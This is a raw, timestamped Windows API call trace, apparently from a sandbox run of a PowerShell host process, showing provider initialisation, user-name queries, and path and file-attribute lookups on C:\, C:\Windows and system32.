	[0292.687] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b786110, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x20cf10, lpMaximumComponentLength=0x20cf0c, lpFileSystemFlags=0x20cf08, lpFileSystemNameBuffer=0x1b785f50, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20cf10*=0x9c354b42, lpMaximumComponentLength=0x20cf0c*=0xff, lpFileSystemFlags=0x20cf08*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0292.687] CoTaskMemFree (pv=0x1b786110) 
	[0292.687] CoTaskMemFree (pv=0x1b785f50) 
	[0292.687] SetErrorMode (uMode=0x1) returned 0x1
	[0292.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.688] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.688] SetErrorMode (uMode=0x1) returned 0x1
	[0292.688] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20ceb0 | out: lpFileInformation=0x20ceb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.689] SetErrorMode (uMode=0x1) returned 0x1
	[0292.689] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.689] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.689] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20ca30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.691] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20ca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.691] SetErrorMode (uMode=0x1) returned 0x1
	[0292.691] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20cce0 | out: lpFileInformation=0x20cce0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.691] SetErrorMode (uMode=0x1) returned 0x1
	[0292.691] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20ca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.691] SetErrorMode (uMode=0x1) returned 0x1
	[0292.691] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20cce0 | out: lpFileInformation=0x20cce0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.692] SetErrorMode (uMode=0x1) returned 0x1
	[0292.692] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.692] SetErrorMode (uMode=0x1) returned 0x1
	[0292.692] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20cd80 | out: lpFileInformation=0x20cd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.692] SetErrorMode (uMode=0x1) returned 0x1
	[0292.692] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0292.692] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0292.693] CoTaskMemFree (pv=0x1b78cc80) 
	[0292.693] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0292.693] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0292.693] CoTaskMemFree (pv=0x447b80) 
	[0292.694] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d18c88*="FileSystem", lpRawData=0x2d18a18) returned 1
	[0292.739] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.739] CoTaskMemFree (pv=0x4ae780) 
	[0292.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.741] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0292.741] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0292.742] CoTaskMemFree (pv=0x1b78cc80) 
	[0292.742] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0292.742] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0292.742] CoTaskMemFree (pv=0x447b80) 
	[0292.742] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d1e4c8*="Function", lpRawData=0x2d1e258) returned 1
	[0292.821] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.821] CoTaskMemFree (pv=0x4ae780) 
	[0293.573] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0293.573] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0293.573] CoTaskMemFree (pv=0x1b78cc80) 
	[0293.574] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0293.574] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0293.574] CoTaskMemFree (pv=0x447b80) 
	[0293.574] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d508a0*="Registry", lpRawData=0x2d50630) returned 1
	[0293.756] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0293.756] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0293.757] CoTaskMemFree (pv=0x1b78cc80) 
	[0293.757] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0293.757] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0293.757] CoTaskMemFree (pv=0x447b80) 
	[0293.757] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d55cb8*="Variable", lpRawData=0x2d55a48) returned 1
	[0293.792] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0293.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.792] CoTaskMemFree (pv=0x4ae780) 
	[0293.793] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0293.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.793] CoTaskMemFree (pv=0x4ae780) 
	[0293.831] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0294.512] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0294.513] CoTaskMemFree (pv=0x1b78cc80) 
	[0294.513] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0294.513] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0294.513] CoTaskMemFree (pv=0x447b80) 
	[0294.513] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d698d0*="Certificate", lpRawData=0x2d69660) returned 1
	[0295.034] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.034] CoTaskMemFree (pv=0x4ae780) 
	[0295.035] GetLogicalDrives () returned 0x4
	[0295.035] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.035] CoTaskMemAlloc (cb=0x20e) returned 0x496620
	[0295.035] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x496620 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0295.036] CoTaskMemFree (pv=0x496620) 
	[0295.037] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.037] CoTaskMemFree (pv=0x4ae780) 
	[0295.037] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.038] CoTaskMemFree (pv=0x4ae780) 
	[0295.055] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.055] CoTaskMemFree (pv=0x4ae780) 
	[0295.059] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.060] CoTaskMemFree (pv=0x4ae780) 
	[0295.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.061] SetErrorMode (uMode=0x1) returned 0x1
	[0295.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20cdd0 | out: lpFileInformation=0x20cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.061] SetErrorMode (uMode=0x1) returned 0x1
	[0295.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.061] SetErrorMode (uMode=0x1) returned 0x1
	[0295.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20cdd0 | out: lpFileInformation=0x20cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.061] SetErrorMode (uMode=0x1) returned 0x1
	[0295.062] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0295.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.062] CoTaskMemFree (pv=0x4ae780) 
	[0295.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.068] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.068] SetErrorMode (uMode=0x1) returned 0x1
	[0295.068] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20cd90 | out: lpFileInformation=0x20cd90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.068] SetErrorMode (uMode=0x1) returned 0x1
	[0295.068] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.068] SetErrorMode (uMode=0x1) returned 0x1
	[0295.068] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20cd90 | out: lpFileInformation=0x20cd90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.068] SetErrorMode (uMode=0x1) returned 0x1
	[0295.069] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cb90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.069] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20ca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.069] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.069] SetErrorMode (uMode=0x1) returned 0x1
	[0295.069] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20cd90 | out: lpFileInformation=0x20cd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.069] SetErrorMode (uMode=0x1) returned 0x1
	[0295.069] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.069] SetErrorMode (uMode=0x1) returned 0x1
	[0295.069] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20cd90 | out: lpFileInformation=0x20cd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.070] SetErrorMode (uMode=0x1) returned 0x1
	[0295.070] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x20ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.070] SetErrorMode (uMode=0x1) returned 0x1
	[0295.070] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20cd90 | out: lpFileInformation=0x20cd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.070] SetErrorMode (uMode=0x1) returned 0x1
	[0295.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.071] SetErrorMode (uMode=0x1) returned 0x1
	[0295.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20cd90 | out: lpFileInformation=0x20cd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.073] SetErrorMode (uMode=0x1) returned 0x1
	[0295.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x20ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.074] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.074] SetErrorMode (uMode=0x1) returned 0x1
	[0295.074] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20cdd0 | out: lpFileInformation=0x20cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.075] SetErrorMode (uMode=0x1) returned 0x1
	[0295.075] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.075] SetErrorMode (uMode=0x1) returned 0x1
	[0295.075] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20cdd0 | out: lpFileInformation=0x20cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.075] SetErrorMode (uMode=0x1) returned 0x1
	[0295.075] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x20cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.075] SetErrorMode (uMode=0x1) returned 0x1
	[0295.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20cdd0 | out: lpFileInformation=0x20cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.076] SetErrorMode (uMode=0x1) returned 0x1
	[0295.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.076] SetErrorMode (uMode=0x1) returned 0x1
	[0295.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20cdd0 | out: lpFileInformation=0x20cdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.076] SetErrorMode (uMode=0x1) returned 0x1
	[0295.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x20cac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.703] SetErrorMode (uMode=0x1) returned 0x1
	[0295.704] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d090 | out: lpFileInformation=0x20d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.704] SetErrorMode (uMode=0x1) returned 0x1
	[0295.716] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0295.716] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d3f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d3f8) returned 0x1
	[0295.717] CoTaskMemFree (pv=0x1b78cc80) 
	[0295.717] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0295.717] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d438 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d438) returned 1
	[0295.717] CoTaskMemFree (pv=0x447b80) 
